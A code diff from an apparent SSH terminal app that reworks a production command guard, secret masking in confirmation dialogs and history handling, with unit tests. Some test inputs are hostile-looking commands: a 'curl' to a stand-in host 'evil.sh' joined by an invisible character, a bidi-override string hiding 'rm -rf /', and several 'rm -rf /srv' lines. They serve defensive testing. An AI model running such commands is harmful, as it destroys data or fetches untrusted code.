-    private fun quotedInput(text: String): () -> String {
-        // The line is read here, beside [lineGuess]'s own read, and joined only if the guard finds
-        // something. Reading it again after the classification would let the two disagree — the
-        // dialog would explain a reason found for one line while quoting another — and joining it
-        // eagerly would build two copies of a multi-megabyte paste that turns out to be harmless.
-        val onLine = if (autocomplete.lineSuspect) "" else autocomplete.currentLine
-        return { (onLine + text).trimEnd { c -> c in runLineControls } }
+        if (guard.holdCommand(text, secrets)) return
+        sendUserInput(text)
     }
 
     /** Run the held command: replays the original input exactly as the path it came from would. */
     fun confirmGuardedCommand() {
-        val held = guard.take() ?: return
+        val held = guard.hold.take() ?: return
         when (held.from) {
             HeldInputSource.Typed -> deliverTypedInput(held.text)
             HeldInputSource.Command -> sendUserInput(held.text)
@@ -874,27 +772,7 @@ class TerminalScreenState(
     // line itself, so dropping it would drop the only thing that asked — and the next Enter over the
     // same shell line would go through unasked. Asking again is the annoying answer; Ctrl-C or
     // Ctrl-U is the way out, and both really do clear the line.
-    fun dismissGuardedCommand() = guard.dismiss()
-
-    /**
-     * The command the shell finished for a line this only holds the beginning of. Read off the
-     * screen because that is the only place it exists, and taken only when it starts with what was
-     * actually typed: the row is the host's to draw, and a line that wrapped leaves nothing but its
-     * tail on it. Recording nothing is what the engine would have done; recording the row itself
-     * would put a command nobody ran into the host's stored history and offer it back as a
-     * suggestion, on this host and in the palette across all of them — which draws what it stores,
-     * so a row carrying a bidi override would read there as a command it is not.
-     */
-    private fun completedLine(typed: String): String? {
-        // Same on the alternate screen: the cursor row is a line of a file, and a file's line is not
-        // a command that ran.
-        if (typed.isEmpty() || altScreen) return null
-        return ProductionGuard.promptCandidates(screenLineToCursor())
-            .lastOrNull()
-            // Strictly longer: a Tab whose completion has not echoed leaves the row reading exactly
-            // what was typed, and that is the prefix rather than a command anyone ran.
-            ?.takeIf { it.length > typed.length && it.startsWith(typed) && it.all(::isSafeTerminalInputChar) }
-    }
+    fun dismissGuardedCommand() = guard.hold.dismiss()
 
     /**
      * Visible cursor row up to the cursor column — the shell line as the user sees it, prompt
@@ -908,6 +786,72 @@ class TerminalScreenState(
         if (grid.isEmpty() || rows <= 0) return ""
         val line = grid.getOrNull(cursorRow) ?: return ""
         return line.take(cursorCol.coerceIn(0, line.size)).joinToString("") { it.text }
+    }
+
+    /**
+     * The whole visible shell line, joined across its soft-wrapped rows, trailing blanks trimmed.
+     * Beside [screenLineToCursor] because the guard needs both: the shell runs the LINE, not the
+     * part of it left of the cursor — a recalled line with the cursor stepped back inside it is
+     * longer than what the cursor bounds, and one that wrapped leaves the cursor on the tail row
+     * with the head, where the risk usually sits, above it. Bounded by the grid.
+     */
+    private fun screenRowText(): String {
+        val grid = screen
+        if (grid.isEmpty() || rows <= 0) return ""
+        if (grid.getOrNull(cursorRow) == null) return ""
+        return buildString {
+            for (row in logicalLineRows(grid)) grid[row].forEach { append(it.text) }
+        }.trimEnd()
+    }
+
+    /**
+     * Whether the shell's line continues past the cursor. Measured in CELLS, never in string
+     * characters: a wide glyph is one character in two columns (its continuation cell draws
+     * nothing) and a combining sequence is several characters in one, while [cursorCol] is a
+     * column — comparing against a joined string's length called a CJK row complete with text
+     * still right of the cursor. Counted across the logical line's soft-wrapped rows, so a cursor
+     * inside a wrapped line reports the tail rows too — and a cursor at the very end of the last
+     * one honestly reports nothing left.
+     */
+    private fun screenRowContinues(): Boolean {
+        val grid = screen
+        if (grid.isEmpty() || rows <= 0) return false
+        if (grid.getOrNull(cursorRow) == null) return false
+        val lineRows = logicalLineRows(grid)
+        // Clamped to the row as [screenLineToCursor] clamps: a cursor parked past the row's width
+        // would overcount what is behind it and call a continuing line complete.
+        var beforeCursor = cursorCol.coerceIn(0, grid.getOrNull(cursorRow)?.size ?: 0)
+        for (row in lineRows.first until cursorRow) beforeCursor += grid[row].size
+        var total = 0
+        for (row in lineRows) {
+            val line = grid[row]
+            var cells = line.size
+            if (row == lineRows.last) while (cells > 0 && line[cells - 1].text.isBlank()) cells--
+            total += cells
+        }
+        return total > beforeCursor
+    }
+
+    /**
+     * Rows of the logical line the cursor sits in: soft-wrap joined, up and down from the cursor
+     * row. Capped, not merely grid-bounded: [screen] includes scrollback, and a host that never
+     * prints a newline chains wrap flags across thousands of rows — joining them would build a
+     * megabyte string on the caller's thread for a classifier that reads 512 characters of a
+     * candidate. The window keeps the rows nearest the cursor, which are the ones the shell's
+     * line actually lives on; past it the join degrades to what the old single-row read saw.
+     */
+    private fun logicalLineRows(grid: List<List<TermCell>>): IntRange {
+        var first = cursorRow
+        while (
+            first > 0 && cursorRow - first < MAX_JOINED_WRAP_ROWS &&
+            grid.getOrNull(first - 1)?.wrapsToNextRow() == true
+        ) first--
+        var last = cursorRow
+        while (
+            last - cursorRow < MAX_JOINED_WRAP_ROWS && last + 1 < grid.size &&
+            grid.getOrNull(last)?.wrapsToNextRow() == true
+        ) last++
+        return first..last
     }
 
     /**
@@ -961,7 +905,7 @@ class TerminalScreenState(
     fun forgetHistoryCommand(command: String) {
         if (!autocomplete.forget(command)) return
         reverseSearch.clampIndex()
-        onHistoryChanged?.invoke(autocomplete.commandHistory.commands)
+        onHistoryChanged?.invoke(autocomplete.commandHistory.persistedCommands)
         refreshSuggestion()
     }
 
@@ -1066,8 +1010,13 @@ class TerminalScreenState(
             // As [typeInput] does: with the echo off nothing else will redraw, and a ghost left over
             // from the line that was just cleared would sit at the cursor of a password prompt.
             refreshSuggestion()
-        } else {
-            trackSentText(text)
+        } else if (!altScreen) {
+            // Not on the alternate screen either: a line sent into a TUI lands in a file or a
+            // prompt of its own, not on the shell's line the tracker models.
+            guard.trackSent(text)
+            // The ghost belonged to the line as it was; drawn over the new one it offers a
+            // completion of text the shell does not have, and Tab would send its tail.
+            refreshSuggestion(lineChanged = true)
         }
         send(text)
     }
@@ -1134,24 +1083,12 @@ class TerminalScreenState(
     fun paste(text: String, mirror: Boolean = true) {
         if (text.isEmpty()) return
         // A paste carrying a newline runs the moment it lands — on a production session it goes
-        // through the same confirmation as a typed command. A paste without one only fills the
-        // shell line, and the Enter that would run it is guarded separately ([typeInput]).
+        // through the same confirmation as a typed command ([TerminalCommandGuard.holdPaste]).
         // The password-prompt exemption is [typeInput]'s, for the same reason: a manager pastes the
         // secret with a trailing newline, and holding it would print it in the dialog.
         // A middle-click paste arrives through a raw pointer handler the modal scrim never sees, so
         // this is the only place that can stop one while a confirmation is open.
-        if (guardPolicy.production && !awaitingSecret &&
-            text.any { it == '\n' || it == '\r' }
-        ) {
-            val held = guard.hold(
-                text,
-                HeldInputSource.Paste,
-                quote = quotedInput(text),
-                screenGuesses = { screenCandidates() },
-                partialGuess = { lineGuess(text) },
-            ) { ownCandidates(text) }
-            if (held) return
-        }
+        if (!awaitingSecret && guard.holdPaste(text)) return
         deliverPaste(text, mirror)
     }
 
@@ -1160,8 +1097,9 @@ class TerminalScreenState(
         // A paste is tracked like typing: without this the Enter after a no-newline paste has
         // nothing to classify (the tracked line is empty and the host's echo may not have arrived
         // yet), and the guard would miss a pasted command. The engine also records the lines a
-        // multi-line paste commits, same as if they had been typed.
-        if (!awaitingSecret) {
+        // multi-line paste commits, same as if they had been typed. Not on the alternate screen:
+        // there the paste lands in a file, and its lines are not commands that ran.
+        if (!awaitingSecret && !altScreen) {
             autocomplete.onUserInput(text.encodeToByteArray())
             refreshSuggestion(lineChanged = true) // the paste moved the line; the screen has not seen it yet
         }
@@ -1267,6 +1205,9 @@ enum class MirroredInput { Typed, Pasted }
 /** Process start mark: the default monotonic clock behind [TerminalScreenState]'s refresh throttle. */
 private val STARTED_AT = TimeSource.Monotonic.markNow()
 
+/** How many soft-wrapped rows [TerminalScreenState.logicalLineRows] joins in each direction. */
+private const val MAX_JOINED_WRAP_ROWS = 64
+
 /** Command to the sole emulator owner; the queue preserves feed/resize ordering. */
 private sealed interface TerminalCommand {
     /** Raw PTY output chunk to feed to the parser. */
@@ -1371,6 +1312,4 @@ private val SCREEN_SNAPSHOT_POLICY = object : SnapshotMutationPolicy<List<List<T
     override fun equivalent(a: List<List<TermCell>>, b: List<List<TermCell>>): Boolean = sameScreen(a, b)
 }
 
-/** Ctrl-O — accept-line-and-down-history: it runs the line and recalls the next entry into it. */
-private const val ACCEPT_LINE_AND_DOWN = '\u000F'
 

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/design/CommandQuoteEscapeTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/design/CommandQuoteEscapeTest.kt
@@ -1,0 +1,47 @@
+package app.skerry.ui.design
+
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertTrue
+
+/**
+ * What a quoted command spells out instead of drawing (issue #246): the format characters past the
+ * basic plane are a category the platform cannot ask about (`Char.category` sees one UTF-16 unit),
+ * so they are matched by block — and the block list used to cover only the tags and variation
+ * selectors, letting `curl<U+1D173>evil.sh` draw as two words and run as one.
+ *
+ * Escaped literals on purpose: a raw invisible character here would be invisible in review and
+ * silently lost on edit.
+ */
+class CommandQuoteEscapeTest {
+
+    @Test
+    fun `an astral format character outside the tag block is spelled out`() {
+        // U+1D173 musical symbol begin beam — Cf, invisible, and not in U+E0000..U+E01EF.
+        val drawn = visibleText("curl\uD834\uDD73evil.sh")
+
+        assertTrue("<U+1D173>" in drawn, "the invisible join is not spelled out: `$drawn`")
+        assertTrue('\uD834' !in drawn, "the raw surrogate still draws: `$drawn`")
+    }
+
+    @Test
+    fun `shorthand and hieroglyph format controls are spelled out`() {
+        assertTrue("<U+1BCA0>" in visibleText("a\uD82F\uDCA0b")) // shorthand format letter overlap
+        assertTrue("<U+13430>" in visibleText("a\uD80D\uDC30b")) // Egyptian hieroglyph vertical joiner
+    }
+
+    @Test
+    fun `a tag character is still spelled out`() {
+        assertTrue("<U+E0041>" in visibleText("ls\uDB40\uDC41x")) // tag latin capital letter A
+    }
+
+    @Test
+    fun `an emoji still draws as itself`() {
+        assertEquals("echo \uD83D\uDE00", visibleText("echo \uD83D\uDE00"))
+    }
+
+    @Test
+    fun `a bidi override in the basic plane is still spelled out`() {
+        assertTrue("<U+202E>" in visibleText("echo safe\u202E; rm -rf /"))
+    }
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookActiveTabTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookActiveTabTest.kt
@@ -55,7 +55,7 @@ class RunbookActiveTabTest {
 
     private fun runbookTarget(sessionId: String) = RunbookTarget(
         sessionId = sessionId,
-        send = {},
+        send = { _, _ -> },
         expectStep = { _, _ -> },
         takeMark = { null },
         outputVersion = { 0L },

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookRunSummaryTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookRunSummaryTest.kt
@@ -35,7 +35,7 @@ class RunbookRunSummaryTest {
         fun target() = RunbookTarget(
             sessionId = id,
             label = id,
-            send = {},
+            send = { _, _ -> },
             expectStep = { _, _ -> },
             takeMark = { token ->
                 val parked = mark

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookRunnerTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookRunnerTest.kt
@@ -66,7 +66,7 @@ class RunbookRunnerTest {
         fun target(sessionId: String = "tab-1") = RunbookTarget(
             sessionId = sessionId,
             // The PTY echoes the typed line; what the terminal was told to expect is captured with it.
-            send = { line -> sent += line; declaredWhenSent += expected.lastOrNull(); outputVersion++ },
+            send = { line, _ -> sent += line; declaredWhenSent += expected.lastOrNull(); outputVersion++ },
             expectStep = { token, hidden -> expected += token; hiddenEcho = hidden },
             // Consuming, and a report of another step is dropped — as TerminalScreenState does it.
             takeMark = { token ->
@@ -154,7 +154,7 @@ class RunbookRunnerTest {
         runbook: Runbook,
         target: RunbookTarget,
         contextValue: (SnippetSegment.Variable) -> String,
-    ): Boolean = requestStart(runbook, target) && confirmStart(contextValue)
+    ): Boolean = requestStart(runbook, target) && confirmStart(contextValue = contextValue)
 
     @Test
     fun a_step_that_goes_quiet_without_reporting_is_flagged() = runnerTest { r, term ->
@@ -447,7 +447,7 @@ class RunbookRunnerTest {
         var runner: RunbookRunner? = null
         val target = RunbookTarget(
             sessionId = "tab-1",
-            send = { line -> term.sent += line },
+            send = { line, _ -> term.sent += line },
             expectStep = { _, _ -> },
             takeMark = { token -> runner!!.stop(); TerminalStepMark(token, 0, "") },
             outputVersion = { 0L },

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookSecretsTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/runbook/RunbookSecretsTest.kt
@@ -1,0 +1,60 @@
+package app.skerry.ui.runbook
+
+import app.skerry.shared.runbook.Runbook
+import app.skerry.shared.runbook.RunbookPolicy
+import app.skerry.shared.runbook.RunbookStep
+import app.skerry.shared.snippet.SnippetMoment
+import app.skerry.shared.snippet.SnippetRunEnvironment
+import kotlinx.coroutines.CoroutineScope
+import kotlinx.coroutines.ExperimentalCoroutinesApi
+import kotlinx.coroutines.cancel
+import kotlinx.coroutines.test.UnconfinedTestDispatcher
+import kotlinx.coroutines.test.runTest
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertTrue
+
+/**
+ * The resolved vault secrets ride with every line a runbook run sends, so the production guard's
+ * confirmation can mask them instead of printing the resolved step (issue #246). A wiring break
+ * here would silently print a secret in clear one dialog after the start dialog masked it. Its own
+ * class beside [RunbookRunnerTest], which is at the size limit and owns the run-lifecycle fixture
+ * this test does not need.
+ */
+@OptIn(ExperimentalCoroutinesApi::class)
+class RunbookSecretsTest {
+
+    @Test
+    fun `a run's resolved vault secrets ride with every sent line`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val runner = RunbookRunner(scope, newId = { "run" }, environment = {
+            SnippetRunEnvironment(
+                moment = SnippetMoment(2026, 7, 26, 14, 5, 9, epochSeconds = 1_784_000_000L),
+                newUuid = { "uuid" },
+                randomChars = { n, _ -> "r".repeat(n) },
+            )
+        })
+        val sentSecrets = mutableListOf<List<String>>()
+        val target = RunbookTarget(
+            sessionId = "tab-1",
+            send = { _, secrets -> sentSecrets += secrets },
+            expectStep = { _, _ -> },
+            takeMark = { null },
+            outputVersion = { 0L },
+            isLive = { true },
+        )
+        val step = RunbookStep.Command(id = "s1", title = "s1", command = "echo \${{vault:db}}", confirm = false)
+        val runbook = Runbook(id = "rb", label = "Deploy", steps = listOf(step), policy = RunbookPolicy(watchdogMinutes = 1))
+        try {
+            assertTrue(runner.requestStart(runbook, target), "requestStart refused")
+
+            assertTrue(runner.confirmStart(secrets = listOf("hunter2")) { "hunter2" })
+
+            assertEquals(RunbookPhase.RUNNING, runner.phase, "run did not start")
+            assertEquals(listOf("hunter2"), sentSecrets.single())
+        } finally {
+            runner.close()
+            scope.cancel()
+        }
+    }
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/MaskSecretsTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/MaskSecretsTest.kt
@@ -1,0 +1,44 @@
+package app.skerry.ui.snippet
+
+import kotlin.test.Test
+import kotlin.test.assertEquals
+
+/**
+ * What a confirmation may draw of text carrying resolved vault secrets (issue #246). The tail rule
+ * exists for strings the classifier CUT mid-secret: an exact replace cannot see a truncated span,
+ * and the alternative printed the secret's head in the guard's aside in clear.
+ */
+class MaskSecretsTest {
+
+    @Test
+    fun `a full secret span is replaced with the mask`() {
+        assertEquals(
+            "echo $SECRET_MASK | sudo -S true",
+            maskSecrets("echo hunter2 | sudo -S true", listOf("hunter2")),
+        )
+    }
+
+    @Test
+    fun `a string cut mid-secret masks the trailing prefix`() {
+        assertEquals("sudo -S $SECRET_MASK", maskSecrets("sudo -S hunt", listOf("hunter2")))
+    }
+
+    @Test
+    fun `text without the secret is left alone`() {
+        assertEquals("uptime", maskSecrets("uptime", listOf("hunter2")))
+    }
+
+    @Test
+    fun `overlapping secrets are masked longest first`() {
+        // Shorter-first would mask only the embedded span and print the longer secret's flanks.
+        assertEquals(
+            "echo $SECRET_MASK and $SECRET_MASK",
+            maskSecrets("echo tok_abc123 and tok_abc", listOf("tok_abc", "tok_abc123")),
+        )
+    }
+
+    @Test
+    fun `blank secrets mask nothing`() {
+        assertEquals("echo x", maskSecrets("echo x", listOf("", "  ")))
+    }
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/SnippetManagerTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/snippet/SnippetManagerTest.kt
@@ -72,7 +72,7 @@ class SnippetManagerTest {
         val id = manager.save(draft(command = "uptime"))
         var sent: String? = null
 
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         assertEquals("uptime\n", sent)
     }
@@ -85,7 +85,7 @@ class SnippetManagerTest {
         val id = manager.save(draft(command = "echo a\u202Eb"))
         var sent: String? = null
 
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         assertEquals("echo ab\n", sent)
     }
@@ -95,7 +95,7 @@ class SnippetManagerTest {
         val manager = managerWith()
         var sent: String? = null
 
-        manager.run("nope") { sent = it }
+        manager.run("nope") { line, _ -> sent = line }
 
         assertNull(sent)
     }
@@ -106,7 +106,7 @@ class SnippetManagerTest {
         val id = manager.save(draft(command = "echo ${'$'}{{date}}"))
         var sent: String? = null
 
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         assertNull(sent)
         val pending = assertNotNull(manager.pendingRun)
@@ -119,7 +119,7 @@ class SnippetManagerTest {
         val manager = managerWith()
         val id = manager.save(draft(command = "echo ${'$'}{{date}}"))
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         manager.confirmRun("echo 2026-07-03", emptyMap())
 
@@ -132,7 +132,7 @@ class SnippetManagerTest {
         val manager = managerWith()
         val id = manager.save(draft(command = "echo ${'$'}{{date}}"))
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         manager.dismissRun()
 
@@ -144,11 +144,11 @@ class SnippetManagerTest {
     fun `confirmRun remembers parameters and prefills the next run of the same snippet`() {
         val manager = managerWith()
         val id = manager.save(draft(command = "ping ${'$'}{{target_host}}"))
-        manager.run(id) { }
+        manager.run(id) { _, _ -> }
         assertTrue(manager.pendingRun!!.initialParams.isEmpty())
 
         manager.confirmRun("ping web1", mapOf("target_host" to "web1"))
-        manager.run(id) { }
+        manager.run(id) { _, _ -> }
 
         assertEquals(mapOf("target_host" to "web1"), manager.pendingRun!!.initialParams)
     }
@@ -159,10 +159,10 @@ class SnippetManagerTest {
         // instead of making the user type them a second time.
         val manager = managerWith()
         val id = manager.save(draft(command = "ping ${'$'}{{target_host}}"))
-        manager.run(id) { }
+        manager.run(id) { _, _ -> }
         manager.confirmRun("ping old", mapOf("target_host" to "old"))
 
-        manager.run(id, params = mapOf("target_host" to "web9")) { }
+        manager.run(id, params = mapOf("target_host" to "web9")) { _, _ -> }
 
         assertEquals(mapOf("target_host" to "web9"), manager.pendingRun!!.initialParams)
     }
@@ -171,10 +171,10 @@ class SnippetManagerTest {
     fun `run without explicit parameters still falls back to the previous run's values`() {
         val manager = managerWith()
         val id = manager.save(draft(command = "ping ${'$'}{{target_host}}"))
-        manager.run(id) { }
+        manager.run(id) { _, _ -> }
         manager.confirmRun("ping old", mapOf("target_host" to "old"))
 
-        manager.run(id, params = emptyMap()) { }
+        manager.run(id, params = emptyMap()) { _, _ -> }
 
         assertEquals(mapOf("target_host" to "old"), manager.pendingRun!!.initialParams)
     }
@@ -184,9 +184,26 @@ class SnippetManagerTest {
         val manager = managerWith()
         val id = manager.save(draft(command = "echo ${'$'}{{date}}"))
 
-        manager.run(id, recording = true) { }
+        manager.run(id, recording = true) { _, _ -> }
 
         assertTrue(manager.pendingRun!!.recording)
+    }
+
+    /**
+     * The dialog's resolved vault secrets reach the terminal beside the line (issue #246): the
+     * production guard masks exactly the spans it is handed, so a wiring break that always sends
+     * an empty list would print the resolved secret in the guard's confirmation.
+     */
+    @Test
+    fun `confirmRun hands the resolved secrets to the terminal`() {
+        val manager = managerWith()
+        val id = manager.save(draft(command = "echo ${'$'}{{vault:db}}"))
+        var secrets: List<String>? = null
+        manager.run(id) { _, s -> secrets = s }
+
+        manager.confirmRun("echo hunter2", emptyMap(), listOf("hunter2"))
+
+        assertEquals(listOf("hunter2"), secrets)
     }
 
     @Test
@@ -201,10 +218,10 @@ class SnippetManagerTest {
         val manager = managerWith()
         val first = manager.save(draft(label = "first", command = "echo ${'$'}{{date}}"))
         val second = manager.save(draft(label = "second", command = "uptime"))
-        manager.run(first) { }
+        manager.run(first) { _, _ -> }
         var sent: String? = null
 
-        manager.run(second) { sent = it } // hotkey/palette while the dialog is up
+        manager.run(second) { line, _ -> sent = line } // hotkey/palette while the dialog is up
 
         assertNull(sent) // not even the plain fast path — first request wins
         assertEquals(first, manager.pendingRun!!.snippet.id)

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/ConfirmationTailsTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/ConfirmationTailsTest.kt
@@ -1,0 +1,450 @@
+package app.skerry.ui.terminal
+
+import app.skerry.shared.guard.ProductionGuardPolicy
+import app.skerry.shared.ssh.PtySize
+import app.skerry.shared.terminal.TerminalSession
+import app.skerry.shared.terminal.TerminalState
+import app.skerry.ui.snippet.SECRET_MASK
+import kotlinx.coroutines.CoroutineScope
+import kotlinx.coroutines.ExperimentalCoroutinesApi
+import kotlinx.coroutines.cancel
+import kotlinx.coroutines.channels.Channel
+import kotlinx.coroutines.flow.Flow
+import kotlinx.coroutines.flow.MutableStateFlow
+import kotlinx.coroutines.flow.StateFlow
+import kotlinx.coroutines.flow.flow
+import kotlinx.coroutines.test.UnconfinedTestDispatcher
+import kotlinx.coroutines.test.runTest
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertFalse
+import kotlin.test.assertNotNull
+import kotlin.test.assertNull
+import kotlin.test.assertTrue
+
+/**
+ * The tails issue #246 collects: what the confirmation dialogs and the history around them still
+ * got wrong after #223. Each test here reproduced its bug before the fix.
+ */
+@OptIn(ExperimentalCoroutinesApi::class)
+class ConfirmationTailsTest {
+
+    // --- Alternate screen and stored history ---
+
+    /**
+     * Inside vim there is no shell line: an Enter in insert mode commits a line of the FILE, and the
+     * engine used to write it into vault-backed history — from where it surfaced as a ghost
+     * suggestion and in the cross-host command palette. Editing a config with a token in it put
+     * that token into stored history.
+     */
+    @Test
+    fun `a line committed on the alternate screen stays out of history`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val history = mutableListOf<List<String>>()
+        val state = TerminalScreenState(session, scope, onHistoryChanged = { history += it })
+
+        session.emit("\u001b[?1049h".encodeToByteArray()) // vim: alternate screen on
+        state.typeInput("api-token=hunter2\r") // Enter in insert mode
+
+        assertTrue(history.flatten().isEmpty(), "a line of an edited file reached stored history: $history")
+
+        session.emit("\u001b[?1049l".encodeToByteArray()) // :q — back to the shell
+        state.typeInput("uptime\r")
+        assertTrue("uptime" in history.flatten(), "the command typed after vim was lost")
+        scope.cancel()
+    }
+
+    /** A paste with a newline inside a TUI is file content too, not a command that ran. */
+    @Test
+    fun `a paste on the alternate screen stays out of history`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val history = mutableListOf<List<String>>()
+        val state = TerminalScreenState(session, scope, onHistoryChanged = { history += it })
+
+        session.emit("\u001b[?1049h".encodeToByteArray())
+        state.paste("secret-config-line\n")
+
+        assertTrue(history.flatten().isEmpty(), "a pasted file line reached stored history: $history")
+        scope.cancel()
+    }
+
+    /**
+     * A ready-made line sent into a TUI (assistant Edit, snippet) lands in the program, not on the
+     * shell's line: tracking it would leave the engine holding TUI text as a shell-line prefix, and
+     * the first command typed after `:q` would be classified and quoted against it.
+     */
+    @Test
+    fun `a line sent into the alternate screen does not pollute the tracked line`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        session.emit("\u001b[?1049h".encodeToByteArray())
+        state.sendUserInputGuarded("iecho scratch") // typed into the TUI, no Enter — nothing runs
+        session.emit("\u001b[?1049l".encodeToByteArray())
+
+        "rm -rf /srv".forEach { state.typeInput(it.toString()) }
+        state.typeInput("\r")
+
+        assertEquals("rm -rf /srv", state.pendingGuardedQuote, "TUI text leaked into the quote")
+        scope.cancel()
+    }
+
+    /** A line half-typed when a TUI opens must not join with what is typed after it closes. */
+    @Test
+    fun `a half-typed line does not survive an alternate-screen round trip`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        "rm -rf ".forEach { state.typeInput(it.toString()) }
+        session.emit("\u001b[?1049h".encodeToByteArray()) // the TUI opens mid-line
+        session.emit("\u001b[?1049l".encodeToByteArray()) // and closes; the shell line is fresh
+        "ls /srv".forEach { state.typeInput(it.toString()) }
+        state.typeInput("\r")
+
+        assertNull(state.pendingGuarded, "the stale prefix joined the command typed after the TUI: ${state.pendingGuardedQuote}")
+        scope.cancel()
+    }
+
+    // --- A quote read off the screen stops at the cursor ---
+
+    /**
+     * Recall a line with the up arrow, step the cursor left, press Enter: the shell runs the WHOLE
+     * line, while the client reads the row only up to the cursor. The dialog used to publish the
+     * prefix's own length as the count, which reads as "shown in full" — with the tail right of the
+     * cursor running unshown. A row that continues past the cursor has no honest count.
+     */
+    @Test
+    fun `a screen quote cut at the cursor is not reported as complete`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // The host draws the recalled line, then the cursor steps back over "-db".
+        session.emit("root@prod:~# rm -rf /srv/prod-db\u001b[3D".encodeToByteArray())
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the guard missed the recalled line")
+        assertNull(
+            state.pendingGuardedQuoteLength,
+            "everything right of the cursor runs; a count over the prefix claims it is all shown",
+        )
+        scope.cancel()
+    }
+
+    /** With the cursor at the end of the row the count is real and stays. */
+    @Test
+    fun `a screen quote with the cursor at the end keeps its count`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        session.emit("root@prod:~# rm -rf /srv/prod-db".encodeToByteArray())
+        state.typeInput("\r")
+
+        assertEquals("rm -rf /srv/prod-db".length, state.pendingGuardedQuoteLength)
+        scope.cancel()
+    }
+
+    /**
+     * The row is measured in cells, not string characters: a wide glyph is one character in two
+     * columns, so a joined string is shorter than the column the cursor sits in — comparing string
+     * length against the column called a CJK row complete with text still right of the cursor.
+     */
+    @Test
+    fun `a row with wide glyphs past the cursor still voids the count`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // Three wide glyphs: 28 string characters in 31 columns. Two columns back leaves the last
+        // glyph right of the cursor — invisible to a character-counted comparison.
+        session.emit("root@prod:~# rm -rf /srv/数据库\u001b[2D".encodeToByteArray())
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the guard missed the recalled line")
+        assertNull(state.pendingGuardedQuoteLength, "the glyph right of the cursor runs; the count claims it is all shown")
+        scope.cancel()
+    }
+
+    /**
+     * A recalled line that wrapped leaves the cursor at the end of the TAIL row, with the head —
+     * where the risk sits — on the row above. Reading the cursor row alone never classified the
+     * head at all: the line ran with no dialog.
+     */
+    @Test
+    fun `a recalled line that wrapped is classified whole`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        val command = "rm -rf /srv/" + "x".repeat(70)
+        session.emit(("root@prod:~# " + command).encodeToByteArray()) // wraps; cursor ends on the tail row
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the head above the cursor row ran unclassified")
+        // The whole logical line is on screen with the cursor at its end: the count is real.
+        assertEquals(command.length, state.pendingGuardedQuoteLength)
+        scope.cancel()
+    }
+
+    /** A recalled line that soft-wrapped runs past the row entirely; no count over it is honest. */
+    @Test
+    fun `a soft-wrapped row is not reported with a complete count`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // 95 characters on an 80-column grid: the row wraps, and the host parks the cursor inside
+        // the wrapped head — the tail lives on the next row.
+        session.emit(("root@prod:~# rm -rf /srv/" + "x".repeat(70)).encodeToByteArray())
+        session.emit("\u001b[1;30H".encodeToByteArray())
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the guard missed the wrapped line")
+        assertNull(state.pendingGuardedQuoteLength, "the tail on the next row runs; the count claims the head is whole")
+        scope.cancel()
+    }
+
